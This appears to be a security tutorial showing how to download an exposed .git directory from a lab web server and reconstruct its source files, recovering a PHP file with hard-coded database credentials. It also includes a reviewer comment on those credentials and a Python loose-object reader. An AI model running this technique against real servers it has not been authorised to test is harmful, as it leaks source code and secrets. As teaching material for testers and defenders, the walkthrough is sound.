The usual case:
The simplest way to check for a git repository is to look for a .git folder.
Tools such as Nessus, Nikto and nmap can be used to do this.
Usually I start by checking the config file.
Next, fetch every file under the .git folder:
wget -r http://192.168.37.128/.git/
We now have the web server's Git repository:
root@kali:~/192.168.37.128: ls -al
total 12
drwxr-xr-x  3 root root 4096 Dec 26 14:28 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:28 .git
root@kali:~/192.168.37.128#
git status shows the difference between our local copy and the web server:
root@kali:~/192.168.37.128: git status
# On branch master
# Changes not staged for commit:
#   (use "git add/rm <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#	deleted:    index.php
#
no changes added to commit (use "git add" and/or "git commit -a")
We can see that index.php is missing from our local repository.
For repositories with only a few files, we can run git diff to see the contents of the missing file:
root@kali:~/192.168.37.128: git diff diff --git a/index.php b/index.php deleted file mode 100644 index 2bd0989..0000000 --- a/index.php +++ /dev/null @@ -1,13 +0,0 @@ -Hello World! - -<?php -$servername = "localhost"; -$username = "admin"; -$password = "password"; - -$conn = new mysqli($servername, $username, $password); - -if ($conn->connect_error) { - die("Connection failed: " . $conn->connect_error); -} -?>
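Review bot: the recovered index.php hard-codes the database credentials ($username = "admin"; $password = "password") in a file served from the web root, so anyone who retrieves the repository the way this walkthrough does reads them directly. Keep credentials in a configuration file outside the document root that the application loads at runtime, and treat these values as compromised once the .git folder has been exposed.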
This lets us see the full index.php file.
We can use git reset --hard to return the working tree to the state of the last commit:
root@kali:~/192.168.37.128: git reset --hard
HEAD is now at ec53e64 hello world
root@kali:~/192.168.37.128: ls -al
total 16
drwxr-xr-x  3 root root 4096 Dec 26 14:37 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:37 .git
-rw-r--r--  1 root root  238 Dec 26 14:37 index.php
root@kali:~/192.168.37.128:
Git stores file data in the objects directory:
root@kali:~/192.168.37.128/.git/objects: ls -al
total 64
drwxr-xr-x 16 root root 4096 Dec 26 14:28 .
drwxr-xr-x  8 root root 4096 Dec 26 14:37 ..
drwxr-xr-x  2 root root 4096 Dec 26 14:28 04
drwxr-xr-x  2 root root 4096 Dec 26 14:28 07
drwxr-xr-x  2 root root 4096 Dec 26 14:28 26
drwxr-xr-x  2 root root 4096 Dec 26 14:28 2b
drwxr-xr-x  2 root root 4096 Dec 26 14:28 83
drwxr-xr-x  2 root root 4096 Dec 26 14:28 8d
drwxr-xr-x  2 root root 4096 Dec 26 14:28 8f
drwxr-xr-x  2 root root 4096 Dec 26 14:28 93
drwxr-xr-x  2 root root 4096 Dec 26 14:28 ae
drwxr-xr-x  2 root root 4096 Dec 26 14:28 ec
drwxr-xr-x  2 root root 4096 Dec 26 14:28 f2
drwxr-xr-x  2 root root 4096 Dec 26 14:28 f3
drwxr-xr-x  2 root root 4096 Dec 26 14:28 info
drwxr-xr-x  2 root root 4096 Dec 26 14:28 pack
There are folders named with just two characters, and inside them are files with random-looking names:
root@kali:~/192.168.37.128/.git/objects/2b: ls -al
total 12
drwxr-xr-x 2 root root 4096 Dec 26 14:28 .
drwxr-xr-x 16 root root 4096 Dec 26 14:28 ..
-rw-r--r-- 1 root root 171 Dec 26 13:32 d098976cb507fc498b5e8f5109607faa6cf645
These folders and the files inside them are in fact the SHA-1 hashes of the blob data: the two-character folder name and the file name together make up the SHA-1 of one object, and each such object holds a piece of the repository's content.
We can view the SHA-1 of index.php with the following command:
git cat-file -p master^{tree}
root@kali:~/192.168.37.128/.git: git cat-file -p master^{tree}
100644 blob 2bd098976cb507fc498b5e8f5109607faa6cf645	index.php
This command lists the SHA-1 of every file in the master branch.
We can pass one of these SHA-1s to git cat-file to display the file's contents:
root@kali:~/192.168.37.128/.git: git cat-file -p 2bd098976cb507fc498b5e8f5109607faa6cf645
Hello World!

<?php
$servername = "localhost";
$username = "admin";
$password = "password";

$conn = new mysqli($servername, $username, $password);

if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
?>
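As an added example (not code from the original post), the following Python shows what git cat-file -p does with the objects/xx/yyyy... files described above: it inflates a loose object with zlib, checks that the SHA-1 of the decompressed data matches the path it was read from, and decodes tree entries into mode, name and SHA-1. It builds its own tiny object store in a temporary directory with a constructed index.php blob instead of touching a real repository.

```python
import hashlib
import os
import tempfile
import zlib
# Added example, not from the original post: a minimal loose-object reader.

def write_loose_object(objects_dir, obj_type, payload):
    """Store payload as a loose object; its name is SHA-1(header + payload)."""
    raw = b"%s %d\0" % (obj_type.encode(), len(payload)) + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(objects_dir, sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha

def read_loose_object(objects_dir, sha):
    """Inflate objects/<sha[:2]>/<sha[2:]>, verify its hash, return (type, payload)."""
    with open(os.path.join(objects_dir, sha[:2], sha[2:]), "rb") as fh:
        raw = zlib.decompress(fh.read())
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("object %s is corrupt: hash mismatch" % sha)
    header, payload = raw.split(b"\0", 1)
    obj_type, size = header.split(b" ")
    if int(size) != len(payload):
        raise ValueError("object %s: declared size does not match" % sha)
    return obj_type.decode(), payload

def parse_tree(payload):
    """Decode tree entries: '<mode> <name>\\0' followed by a 20-byte raw SHA-1."""
    entries, pos = [], 0
    while pos < len(payload):
        nul = payload.index(b"\0", pos)
        mode, name = payload[pos:nul].decode().split(" ", 1)
        entries.append((mode, name, payload[nul + 1:nul + 21].hex()))
        pos = nul + 21
    return entries

def demo():
    """Build a store with a constructed index.php blob and a tree, then read both back."""
    objects_dir = os.path.join(tempfile.mkdtemp(), ".git", "objects")
    blob_sha = write_loose_object(objects_dir, "blob", b"Hello World!\n")
    tree_sha = write_loose_object(
        objects_dir, "tree", b"100644 index.php\0" + bytes.fromhex(blob_sha))
    tree_type, tree_payload = read_loose_object(objects_dir, tree_sha)
    entries = parse_tree(tree_payload)
    blob_type, blob_payload = read_loose_object(objects_dir, entries[0][2])
    return tree_type, entries, blob_sha, blob_type, blob_payload
```

Point read_loose_object and parse_tree at a real .git/objects directory and the tree SHA-1 from git cat-file -p master^{tree} to reproduce the listing above without a git client.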
OWASP Zed Attack Proxy (ZAP) can automatically extract files (usually the application's source code) from an exposed git folder. One advantage of ZAP is that it does not require directory listing to be enabled; instead, ZAP parses the internal git files and extracts the code directly, without relying on additional tools such as a git client.
ZAP can also extract exposed SVN folders.